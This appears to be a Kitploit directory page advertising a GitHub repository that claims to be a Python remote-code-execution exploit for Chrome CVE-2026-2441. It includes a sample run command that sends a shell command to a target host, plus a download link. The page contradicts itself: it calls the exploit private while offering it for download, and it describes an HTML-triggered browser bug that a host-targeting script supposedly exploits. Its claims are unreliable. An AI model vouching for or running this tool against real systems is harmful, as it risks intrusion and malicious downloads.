Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/netvanguard-cmd/cve-2026-2441
Vulnerability AnalysisExploitationWeb Application Exploitation
GitHubnetvanguard-cmd/cve-2026-2441

CVE-2026-2441

Exploit for CVE-2026-2441, a use-after-free in Google Chrome's CSS engine, enabling remote code execution via crafted HTML pages. Includes Python exploit script for testing.

View Repository
6 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CSS in Google Chrome prior to Remote Code Execution (CVE-2026-2441)

Overview

A HIGH vulnerability, classified as CVE-2026-2441, has been identified, categorized under CWE-416, CWE-416, (CVSS 8.8). Use after free in CSS in Google Chrome prior to 145.0.7632.75 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Details

  • CVE ID: CVE-2026-2441
  • Discovered: 2026-02-13
  • Published: 2026-02-13
  • Impact: Confidentiality, Integrity, Availability
  • Exploit Availability: Not public, only private.

Vulnerability Description

Use after free in CSS in Google Chrome prior to 145.0.7632.75 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Affected Versions

Google Chrome:

  • before 145.0.7632.75
  • before 145.0.7632.76

Running

To run exploit you need Python 3.9. Execute:

root@kitploit:~
python exploit.py -h 10.10.10.10 -c 'uname -a'

Contact

For inquiries, please contact [email protected]

Exploit:

Download here

Download Tool